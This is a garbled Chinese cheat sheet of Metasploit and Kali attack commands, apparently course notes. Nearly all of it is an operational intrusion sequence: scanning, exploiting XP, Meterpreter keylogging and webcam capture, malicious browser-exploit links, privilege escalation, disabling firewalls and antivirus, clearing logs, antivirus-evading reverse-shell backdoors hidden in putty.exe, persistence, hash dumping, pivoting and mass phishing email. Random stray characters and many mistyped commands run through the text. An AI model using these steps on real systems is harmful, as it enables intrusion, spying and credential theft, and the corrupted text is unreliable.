一癣朗、安裝VM、在VM中裝XP旺罢、在VM中裝kali
二旷余、data、external扁达、tools荣暮、plugins和scripts、exploits罩驻、auxiliary穗酥、payloads
三、漏洞利用基礎(chǔ)
nmap -v -n 192.168.0.103(目標(biāo)主機IP)
nmap -T4 -A -V 192.168.0.103
msf search dcom 在Metasploit中搜相關(guān)服務(wù)的漏洞
www.1337day.com / securityfocus/exploitdb 在線查找漏洞
gcc dcom.c -o dcom 下載后編譯漏洞代碼
./dcom 運行漏洞
./dcom 6 192.168.174.129 對目標(biāo)主機IP進(jìn)行攻擊
msfconsole /: use exploit/windows/smb/msp8-067-nctapi 選擇一個漏洞攻擊
show options 查看攻擊條件
set RHOST 192.168.0.103 設(shè)置目標(biāo)主機IP地址革RHOST
exploit 攻擊惠遏!
四砾跃、Metterpreter基礎(chǔ)
help
sysinfo
screenshot
ps 顯示正在運行的進(jìn)程
migrate 1512 遷移進(jìn)程ID
getpid 驗證進(jìn)程,被攻擊主機當(dāng)前進(jìn)程
keyscan_start 啟動按鍵記錄器
keyscan_dump
keyscan_stop 停止按鍵記錄
webcam_list 查看攝像頭
webcam_snap 攝像頭拍照
getuid 被攻擊主機名字
shell
mkdir hacked
shutdown -s -t 15 -c "YOU ARE HACKED" 關(guān)閉被攻擊主機节吮,并顯示一條消息
五抽高、漏洞掃描與信息收集
whois 收集域名信息
use auxiliary/gather/search_email_collector 使用郵件收集模塊
show options
set domain
run
use auxiliary/scanner/telnet/telnet_version 使用telnet版本掃描器
show options
set RHOSTS 192.168.0.103
run
use auxiliary/scanner/rdp/ms12_020_check RDP掃描器
set PORTS 3389
set RHOST 192.168.11.46
run
nmap 192.168.11.29
nmap 192.168.11.46 192.168.11.29
nmap -iL /root/Desktop/list.txt 掃描目標(biāo)列表
nmap -sp 192.168.11.2-60 ping掃描
nmap -PA 192.168.11.46 TCP ACK ping
nmap -pe 192.168.11.46 ICMP回顯ping
nmap -R 66.147.244.90 強制DNS反向解析
nmap -sS 192.168.0.104 TCP SYN掃描
nmap -sN 192.168.0.103 TCP空掃描
nmap -scanflags SYNURG 192.168.0.102 自定義TCP掃描
nmap -F 192.168.11.46 快速掃描
nmap -P http 192.168.11.57 基于名稱的端口掃描
nmap -r 192.168.11.46 順序端口掃描
nmap -f 192.168.11.29 報文分析(Fragment Packets)
nmap -sI 192.168.11.29 192.168.11.46 空閑僵尸掃描(Idle Zombie Scan)
nmap -spoof -mac Apple 192.168.11.29 偽造MAC地址
nmap -oN scan.txt 192.168.11.46 保存掃描結(jié)果
load nessus 檢測漏洞、錯誤配置透绩、默認(rèn)憑證
nessus_help
nessus_connect root:toor@localhost:8834 ok 連接本地主機
nessus_policy_list
nessus_new_scan -2 windowsxpSCAN 192.168.0.103 對目標(biāo)主機掃描
nessus_scan_status
nessus_report_list 檢查結(jié)果
nessus_report_hosts (report ID) 打開報告
nessus_report_host_ports 192.168.0.103 (report ID) 查看詳細(xì)信息
db_status
db_import /root/Desttop/scan.xml 導(dǎo)入Nmap報告
hosts 192.168.0.102 從msf訪問數(shù)據(jù)庫
services 192.168.0.102 檢查開放端口信息
db_import /root/Desktop/Nessus_scan.nessus 導(dǎo)入nessus報告
vulns 192.168.0.103 查看主機漏洞信息
六翘骂、客戶端漏洞利用(生成惡意鏈接讓被攻擊者打開)
use auxiliary/server/browser autopwn 對瀏覽器攻擊
show options
set LHOST 192.168.11.23 攻擊者IP
set SRVHOST 192.168.11.23 服務(wù)器本地主機地址
set SRVPORT 80 本地端口地址
run 生成惡意UPR,發(fā)送給被攻擊者
session
session -i 1 選擇meterpreter會話對攻擊目標(biāo)執(zhí)行攻擊
use windows/browser/ms10_046_shortcat_icon_dllloader IE快捷方式圖標(biāo)漏洞攻擊
show options
set SRVHOST 192.168.0.109
set SRVPORT 80
set URIDATH 1
exploit
using URL:http://192.168.0.109:80/
session
session -i 1
use exploit/windows/browser/ms10_022_ie_vbscript_windhlp32 IE惡意VB代碼
show options
set SRVHOST 192.168.0.105
set SRVPORT 80
set URIPATH /
exploit
session
session -i 1
七帚豪、后漏洞利用
sysinfo
getpid
run checkvm
idletime 檢查目標(biāo)主機是否運行在虛擬機上
run get_env 檢查目標(biāo)主機是否正在運行
ipconfig
route 檢查目標(biāo)主機網(wǎng)絡(luò)設(shè)置
run getcountermeasure 檢查目標(biāo)主機防火墻配置信息
run getgui 檢查目標(biāo)主機遠(yuǎn)程桌面
run getgui -e
run gettelnet
run gettelnet -e
run get_local_subnets
run hostedit
run hostedit -e 127.0.0.1 www.apple.com 添加host條目
run enum_logged_on_users
run enum_logged_on_users -c
run get_applicatioin_list
run windows/gather/forensics/enum_drives
run windows/gather/enum_ms_product_keys
run window/gather/crodentials/windows_autologin
run winenum 枚舉系統(tǒng)信息
cd /root/msf4/logs/scripts/wineum/EXPLOIT_DFE265D 20130327-2532
cat hashdump.txt
run scrapper
cd /.msf4/logs/scripts/scraper/192.168.0.104 2013032756309503
cat services.txt 轉(zhuǎn)儲其他枚舉腳本攻擊提取到的信息
八碳竟、后漏洞利用——提權(quán)
use exploit/windows/http/minishare_get_overflow 遠(yuǎn)程緩沖溢出漏洞攻擊代碼
show options
set RHOST 192.168.0.102
set RPORT 80
show targets
set TARGET 3 設(shè)置目標(biāo)系統(tǒng)類型
exploit
getuid
getsystem -h
getsystem -t 0 實現(xiàn)管理權(quán)限
ps
run post/windows/escalate/getsystem 提升權(quán)限
run post/windows/oscalate/service_permissions
use exploit/windows/brower/ms10_002_aurora 另一個漏洞攻擊msf
show options
set SRVHOST 192.168.0.109
exploit
九、后漏洞利用——清除痕跡
run getcountermeasure 查看防火墻狀態(tài)
netsh firewall show opmode
net firewall show opmode mode=disaable 禁用防火墻
upload root/Desktop/disable.vbs C:\ 使用VB腳本禁用防火墻
cd C:\
disable.vbs
run killav 關(guān)閉殺毒軟件
tasklist
tasklist /svc 對進(jìn)程分類
tasklist /svc/find/I "avg"
sc queryex avgwd
sc config avgwd start=disabled 強制關(guān)閉殺毒軟件進(jìn)程
clearev 清除日志
十狸臣、后漏洞利用——后門
show payloads
cd /opt/metasploit/msf3 查看后門工具
./msfpayload -h
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 X>root/Desktop/vins.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105 R | msfencode -e x80/shikataa_nai -c 6 -t exe -x/root/Desktop/putty.exe -o /root/Desktop/viruspcotty.ext 后門程序發(fā)送給被攻擊者
show encoders 編碼器列表
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.105... 后門程序免殺處理
use exploit/multi/handler 當(dāng)后門發(fā)給被攻擊者后運行此命令
set PAYLOAD windows/meterpreter/reverse_tcp 設(shè)置攻擊載荷信息
set LHOST 192.168.0.103
exploit
run metsvc -h 另一個后門程序metsvc
run metsvc -A 啟動后門程序
run metsvc -r 刪除后門程序
run persistence -h 持久性后門
run persistene -A -L c:\\ -s -x -p 445 i 10 -r 192.168.0.103 持久性后門運行
resource /root/.msf4/logs/persistence/PWNED -02526E0337...
upload /root/Desktop/nc.exe c:... 另一個持久性后門
run reg enumkey -k HKLM\\...
reg setval -k HKLM\\...
reg queryval =k HKLM\\.. netcat運行
netsh firewall add portopening ...
nc -v 192.168.0.107 445 用netcat連接被攻擊者
十一莹桅、后漏洞利用——跳板與網(wǎng)絡(luò)嗅探
ipconfig
route
run autoroute -h
run autoroute -s 10.10.10.1/24 添加一條指向目標(biāo)主機的路由
run autoroute -p 驗證是否添加成功
getsystem 提權(quán)
run hashdump 轉(zhuǎn)儲所有用戶的散列密碼
use auxiliary/scanner/portscan/tcp 掃描其他地址
show options
set rhosts 10.10.10.1/24
set ports 193,445
set threads 50
run
use exploit/windows/... 開始掃描
set rhost 10.10.10.2
set payload windows/...
exploit
use sinffer 使用嗅探器
sniffer interfaces 枚舉網(wǎng)卡
sniffer_start 1
sniffer_dump 1 hacked.pcap 轉(zhuǎn)儲抓包
wireshark hacked.pcap
run packetrecorder 另一個嗅探工具
run packetrecorder -1i 抓包保存
run packetrecorder -i 1 -l/root/Desktop
load espia 截屏插件
screengrap
十二、Metasploit漏洞攻擊代碼研究
十三烛亦、使用社會工程學(xué)工具包和Armitage
進(jìn)入SET目錄诈泼,找到set_config文件懂拾,打開set_config文件,設(shè)置Metasploit的目錄路徑铐达,將SENDMAIC設(shè)置為ON岖赋,EANIL_PROIPER設(shè)置為我們使用的軟件的名字。安裝sendmail程序瓮孙。啟動SET贾节。選1執(zhí)行后,選5進(jìn)行郵件群發(fā)送
打開終端衷畦,輸入armitage,之后根據(jù)默認(rèn)一路next
開啟掃描知牌,選擇Host|MSF scanf祈争,輸入IP
選擇Hosts|Nmap Scan|Intense Scan,輸入IP
選擇Attacks|HailMary,開始自動攻擊
攻陷后角寸,右擊被攻陷系統(tǒng)菩混,選擇Meterpreter|Interact。打開終端扁藕,輸入vncviewer,輸入得到的IP和端口沮峡,然后可看到被攻擊對象的桌面了
選擇Explore|browse Files
選擇Access|Pump Hashers|scs method.選擇View|Credentials,查看傳輸結(jié)果亿柑。